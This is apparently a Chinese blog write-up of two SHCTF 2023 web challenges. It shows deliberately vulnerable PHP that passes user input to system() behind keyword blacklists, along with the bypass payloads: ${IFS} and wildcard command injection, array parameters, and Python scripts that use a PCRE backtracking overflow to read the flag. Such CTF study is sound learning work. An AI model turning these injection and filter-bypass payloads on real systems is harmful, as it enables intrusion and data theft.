SHCTF-web-wp

CTF

发布日期: 2023-11-01

更新日期: 2023-11-01

文章字数: 332

阅读时长: 1 分

阅读次数:

1.ez_rce

<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
            echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

?rce=ls  #有flag.php
?rce=cp${IFS}fla?.php${IFS}a.txt

<?php
$flag = getenv('GZCTF_FLAG');
if($flag=="not_flag" or $flag==""){
	$flag="dzctf{test_flag}";
}   #假的flag

?rce=ls${IFS}/ #有flag
?rce=cp${IFS}/fla?${IFS}a.php   #然后url/a.php 可得flag

2.ez_php

<?php 
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
    $code = (String)$_POST['c_ode'];
    $num=$_GET['num'];
    if(preg_match("/[0-9]/", $num))
    {
        die("no number!");
    }
    elseif(intval($num))
    {
      if(preg_match('/.+?SHCTF/is', $code))
      {
        die('no touch!');
      }
      if(stripos($code,'2023SHCTF') === FALSE)
      {
        die('what do you want');
      }
      echo $flag;
    }
}

PHP intval()函数详解，intval()函数漏洞原理及绕过思路_intval绕过-CSDN

回溯法绕过正则匹配

import requests
url="http://112.6.51.212:31842/?num[]=1"
data={
'c[ode':'a'*1000000+'2023SHCTF'  
}
r=requests.post(url,data=data)
print(r.text)

本题与下面一道题进行对比：

<?php

$as=$_POST['as'];
$code = $_POST['code'];

function process($code){
    return preg_replace("/php|cat|tac|assert|pcntl_exec|fwrite|curl|sleep|eval|system|assert|flag|shell_exec|passthru|exec|F10g|fl0g|fl1g|phar/i",'',$code);
}

if(!is_array($as)){

    if(!preg_match_all('/but.*how/is',$as)){

        if(strpos($as,'but how')!==false){
            
            system(process($code));
            
        }else{
            die('tip: backup file there');
        }

    }else{
        die('NO there');
    }
}
?>

import requests
url=""
data={
'as':'but how'+'a'*1000000,
'code':'sort /flflagag'
}
r=requests.post(url,data=data)
print(r.text)

正则回溯地方不同点在于前者是stripos()函数，后者是strpos()函数。

[PHP] strpos stripos strrpos strripos的区别-CSDN博客

123

harmor

https://harmor123.github.io/harmor.github.io/harmor.github.io/2023/11/01/shctf/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 harmor !

SHCTF web WP

本篇

SHCTF-web-wp

2023-11-01 CTF

SHCTF web WP

RSA(持续补充)

2023-11-01 CTF

CTF crypto

1.ez_rce

2.ez_php

本题与下面一道题进行对比：

你的赏识是我前进的动力